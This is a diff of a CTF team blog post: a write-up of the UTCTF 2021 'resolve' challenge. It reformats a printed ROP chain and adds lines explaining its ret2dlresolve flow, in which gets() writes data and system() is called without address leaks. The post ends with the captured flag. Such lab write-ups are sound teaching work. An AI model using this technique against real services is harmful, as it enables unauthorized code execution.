ubcctf/ubcctf.github.io/_posts/2021-3-14-utctf-resolve.md

 The rop chain looks something like this:

 ```
-0x0000:         0x4011c3 pop rdi; ret                                                                                   0x0008:         0x404e00 [arg0] rdi = 4214272                                                                           0x0010:         0x401044 gets                                                                                           0x0018:         0x401159                                                                                                0x0020:         0x4011c3 pop rdi; ret                                                                                   0x0028:         0x404e50 [arg0] rdi = 4214352                                                                           0x0030:         0x401020 [plt_init] system                                                                              0x0038:            0x310 [dlresolve index]
+0x0000:         0x4011c3 pop rdi; ret
+0x0008:         0x404e00 [arg0] rdi = 4214272
+0x0010:         0x401044 gets(arg0)
+0x0018:         0x401159 ret; #for stack alignment
+0x0020:         0x4011c3 pop rdi; ret
+0x0028:         0x404e50 [arg0] rdi = 4214352
+0x0030:         0x401020 [plt_init] system
+0x0038:         0x310 [dlresolve index]
 ```

+Our overall program flow will look like `main()->pop rdi->gets()->pop rdi->system()->_dl_runtime_resolve()->system()`.
+The `pop rdi`'s are to setup arguments to functions later in the chain.

 So just aim this at the server and ye shall receive the flag.
 `utflag{2_linker_problems_in_one_ctf?8079235}`

 It's pretty cool that we can still call libc functions without the use of address leaks.
 This exploit will definitely be something that I keep in mind for the future.
 Although it was really simple for this challenge due to no PIE which probably simplified where we could put the dlpayload.
+Also pwntools is an awesome tool and thank god it exists.